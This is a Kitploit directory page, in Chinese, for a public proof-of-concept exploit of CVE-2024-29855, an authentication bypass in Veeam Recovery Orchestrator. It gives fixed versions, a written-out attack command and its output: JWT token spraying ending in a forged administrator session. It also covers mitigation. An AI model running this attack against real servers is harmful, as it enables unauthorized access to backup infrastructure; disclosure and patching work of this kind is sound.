Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-29855 — Veeam Recovery Orchestrator 身份验证 CVE-2024-29855 的 PoC | Kitploit
工具/GitHubGitHub/sinsinology/cve-2024-29855
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证红队
GitHubsinsinology/cve-2024-29855

CVE-2024-29855

Veeam Recovery Orchestrator 身份验证 CVE-2024-29855 的 PoC

查看仓库
20612年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-29855

Veeam Recovery Orchestrator 认证绕过漏洞(CVE-2024-29855),作者:Sina Kheirkhah (@SinSinology),来自 SummoningTeam (@SummoningTeam)

技术分析

关于该漏洞的根本原因分析,请参阅我的博客

概念验证

总结

Veeam 发布了一份 CVSS 9 分 的安全公告,指出了影响 Veeam Recovery Orchestrator 的 认证绕过漏洞 CVE-2024-29855。以下是我对该问题的完整分析与利用代码。尽管该问题听起来没有那么严重(完全无需恐慌),但我认为该漏洞的机制颇为有趣,因此决定发布详细的分析与利用代码。

受影响版本?

根据 Veeam 官方安全公告,该漏洞已从以下版本开始修复:

  • Veeam Recovery Orchestrator 7.1.0.230
  • Veeam Recovery Orchestrator 7.0.0.379

使用方法

root@kitploit:~
python CVE-2024-29855.py  --start_time 1718264404 --end_time 1718264652 --username [email protected] --target https://192.168.253.180:9898/

 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |
                                                                                    
        (*) Veeam Recovery Orchestrator Authentication Bypass (CVE-2024-29855) 
        
        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)
        
        (*) Technical details: https://summoning.team/blog/veeam-recovery-Orchestrator-auth-bypass-CVE-2024-29855/
        
        
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(+) Pwned Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.gpvNsv78cZRt6qelKMIzprAQG_Eva6pKyNLLGIrnXkA, Status code: 200
(+) Response: {"user":"[email protected]","siteName":null,"siteRole":"Unknown","isLogged":true,"formats":{"shortTime":"H:i","longTime":"H:i:s","shortDate":"m/d/Y","shortTimeHR":"HH:mm","longTimeHR":"HH:mm:ss","shortDateHR":"MM/dd/yyyy","firstDayOfWeek":"Sunday"},"roles":["SiteSetupOperator"],"siteScopeRoles":[{"id":"00000000-0000-0000-0000-000000000000","name":"All Scopes","roles":[]}],"displayUserName":"EVILCORP\\Administrator","uiTimeout":3600,"dnsName":"WIN-I61UGP29579.evilcorp.local","domainName":"evilcorp.local"}
                                                                        

缓解措施

升级到最新版本,或按照 Veeam 安全公告中的说明进行缓解。

  • https://www.veeam.com/kb4585

关注我们的 Twitter 以获取最新安全研究:

  • SinSinology
  • SummoningTeam

免责声明

本软件纯粹为学术研究和开发有效防御技术而创建,除非明确授权,否则不得用于攻击任何系统。项目维护者对软件的滥用不承担任何责任。请负责任地使用。

下载工具